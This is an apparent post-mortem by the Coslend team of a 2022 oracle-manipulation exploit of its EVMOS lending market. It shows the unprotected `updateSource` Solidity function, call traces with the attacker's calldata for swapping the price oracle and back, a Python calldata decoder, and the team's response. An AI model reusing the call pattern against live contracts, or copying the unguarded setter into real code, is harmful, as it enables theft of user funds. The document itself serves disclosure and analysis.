On Jun 22, 2022, the Coslend lending market was exploited.

The hacker “borrowed” all the funds from the Coslend lending market by manipulating the prices of the collateral assets.

The total loss:
~64,305.596 USDC
~9,604.913 USDT
~1,826.745 FRAX
~14.2980 WETH

The hacker transferred the funds from EVMOS mainnet to Ethereum mainnet through Nomad, and then to Polygon through Celer.

Finally, the hacker swapped all the funds to $MATIC and deposited all the $MATIC tokens into Tornado Cash.

In the Coslend PriceOracle V1 contract, there is a method to update the oracle source, but it is missing an important permission check: the `onlyOwner` check.

```solidity
// Vulnerable as deployed: no onlyOwner modifier, so any caller can replace
// the price source (and its type/availability) of any market token.
function updateSource(address marketToken, uint index, address source, string memory sourceType, bool available) public {
    TokenConfig storage tokenConfig = tokenConfigs[marketToken];
    PriceOracle storage priceOracle = tokenConfig.oracles[index];
    priceOracle.source = source;
    priceOracle.available = available;
    priceOracle.sourceType = sourceType;
}
```

Based on this vulnerability, the hacker carried out two attack transactions:

  1. 0xc1c3828e7f47cd782f03536b54daaac66065be0cb7e992cee76e4729ad2fdfcf
  2. 0x7b2a5f7d3d770db7e7994dff87356ff653cdb6367ee1bef8d8e6fe37f3ecbd98

Technical details of transaction 1:

  1. The hacker used the `updateSource` method to change the oracle source to `0x8d3103F84998EF6ae90ac5e974Af6290ef2C1037`. The call trace:
```json
{
  "calls": [
    {
      "from": "0x1cf161b64b201cb3e5e97f255e84a858fd800faf",
      "gas": "0x11fcfb2",
      "gasUsed": "0x278a",
      "input": "0x66c8ea9400000000000000000000000011a7ec40a34cf6bb07414f3690b41eb94bf121eb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000008d3103f84998ef6ae90ac5e974af6290ef2c103700000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000006437573746f6d0000000000000000000000000000000000000000000000000000",
      "output": "0x",
      "to": "0x64e7d35626494a375fbf0cd1bacc5af26cd0cb17",
      "type": "DELEGATECALL"
    }
  ],
  "from": "0xd74f0ca17ca367e746dee201271949fc7dea3d54",
  "gas": "0x124646d",
  "gasUsed": "0x2ae7",
  "input": "0x66c8ea9400000000000000000000000011a7ec40a34cf6bb07414f3690b41eb94bf121eb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000008d3103f84998ef6ae90ac5e974af6290ef2c103700000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000006437573746f6d0000000000000000000000000000000000000000000000000000",
  "output": "0x",
  "to": "0x1cf161b64b201cb3e5e97f255e84a858fd800faf",
  "type": "CALL",
  "value": "0x0"
}
```

  2. Set the WETH price to `9.094947017729283e+37`.

  3. The hacker borrowed 9604.913184 USDT, 64305.595548 USDC and 1826.7445016751678 FRAX.

  4. The hacker used the `updateSource` method again to change the oracle source back to the original source. The call trace:

```json
{
  "calls": [
    {
      "from": "0x1cf161b64b201cb3e5e97f255e84a858fd800faf",
      "gas": "0x11197a5",
      "gasUsed": "0x976",
      "input": "0x66c8ea9400000000000000000000000011a7ec40a34cf6bb07414f3690b41eb94bf121eb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000004c8f111a1048fec7ea9c9cbab96a2cb5d1b9456000000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000004466c757800000000000000000000000000000000000000000000000000000000",
      "output": "0x",
      "to": "0x64e7d35626494a375fbf0cd1bacc5af26cd0cb17",
      "type": "DELEGATECALL"
    }
  ],
  "from": "0xd74f0ca17ca367e746dee201271949fc7dea3d54",
  "gas": "0x115f299",
  "gasUsed": "0xcd3",
  "input": "0x66c8ea9400000000000000000000000011a7ec40a34cf6bb07414f3690b41eb94bf121eb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000004c8f111a1048fec7ea9c9cbab96a2cb5d1b9456000000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000004466c757800000000000000000000000000000000000000000000000000000000",
  "output": "0x",
  "to": "0x1cf161b64b201cb3e5e97f255e84a858fd800faf",
  "type": "CALL",
  "value": "0x0"
}
```
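As an added example (not Coslend's code), the Python below decodes the `input` calldata of the two `updateSource` calls in the traces above, which is the check an investigator does to confirm exactly what each unauthenticated call changed. The selector, addresses and calldata words are copied from the traces; the ABI layout follows from the function signature `updateSource(address,uint256,address,string,bool)`.

```python
# Added example, not Coslend's code: decode the calldata of the two updateSource
# calls shown in the traces above. All hex values are copied from the page.
UPDATE_SOURCE_SELECTOR = "66c8ea94"  # first 4 bytes of both trace inputs

# Step-1 call, split into 32-byte ABI words (comments name each word).
CALL_1 = "0x" + UPDATE_SOURCE_SELECTOR + "".join([
    "00000000000000000000000011a7ec40a34cf6bb07414f3690b41eb94bf121eb",  # marketToken
    "0000000000000000000000000000000000000000000000000000000000000000",  # index
    "0000000000000000000000008d3103f84998ef6ae90ac5e974af6290ef2c1037",  # source
    "00000000000000000000000000000000000000000000000000000000000000a0",  # string offset
    "0000000000000000000000000000000000000000000000000000000000000001",  # available
    "0000000000000000000000000000000000000000000000000000000000000006",  # string length
    "437573746f6d0000000000000000000000000000000000000000000000000000",  # "Custom"
])
# Step-4 call that restored the original source.
CALL_2 = "0x" + UPDATE_SOURCE_SELECTOR + "".join([
    "00000000000000000000000011a7ec40a34cf6bb07414f3690b41eb94bf121eb",
    "0000000000000000000000000000000000000000000000000000000000000000",
    "0000000000000000000000004c8f111a1048fec7ea9c9cbab96a2cb5d1b94560",
    "00000000000000000000000000000000000000000000000000000000000000a0",
    "0000000000000000000000000000000000000000000000000000000000000001",
    "0000000000000000000000000000000000000000000000000000000000000004",
    "466c757800000000000000000000000000000000000000000000000000000000",  # "Flux"
])

def decode_update_source(calldata: str) -> dict:
    """Decode updateSource(address,uint256,address,string,bool) calldata:
    selector, five head words (marketToken, index, source, tail offset,
    available), then the tail (string length word + right-padded bytes)."""
    data = bytes.fromhex(calldata[2:] if calldata.startswith("0x") else calldata)
    if data[:4].hex() != UPDATE_SOURCE_SELECTOR:
        raise ValueError(f"unexpected selector 0x{data[:4].hex()}")
    body = data[4:]

    def word(i: int) -> bytes:
        return body[32 * i:32 * (i + 1)]

    def address(w: bytes) -> str:
        if any(w[:12]):  # strict ABI: the 12 high bytes of an address word are zero
            raise ValueError("non-zero padding in address word")
        return "0x" + w[12:].hex()

    offset = int.from_bytes(word(3), "big")
    length = int.from_bytes(body[offset:offset + 32], "big")
    return {
        "market_token": address(word(0)),
        "index": int.from_bytes(word(1), "big"),
        "source": address(word(2)),
        "source_type": body[offset + 32:offset + 32 + length].decode("ascii"),
        "available": int.from_bytes(word(4), "big") == 1,
    }
```

Both calls target the same market token at oracle index 0; the first installs a "Custom" source and the second restores the "Flux" source, which is why the on-chain price only looked wrong for the duration of the transaction.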

Technical details of transaction 2:

As in transaction 1, the hacker set the USDC price to `1.00008693e+30` and then “borrowed” 14.298043896860449 WETH.

The Coslend team will implement a fix for this issue by adding the `onlyOwner` check.

  1. Borrowing and withdrawal have been suspended after the exploit to avoid further losses.
  2. Supply has been suspended after our tests on the contracts.
  3. Got in touch with the EVMOS team for more tx details.
  4. Got in touch with the Nomad team for more details of their bridge token contracts → no problems have been found.
  5. Got in touch with the Flux team for more details of their oracle contracts → no problems have been found.
  6. Thanks to the Kenesis team for their care and advice; it’s so sweet.
  7. Due to the current imperfect infrastructure, we spent more time building data analysis tools and eventually identified the cause of this incident.

We will work out an improvement plan and a compensation plan as soon as possible based on the current situation.

Stay tuned!

We encourage the hacker to reach out and start a conversation with us for the return of our users’ funds.

We will honor a bug bounty of 10% upon return of funds.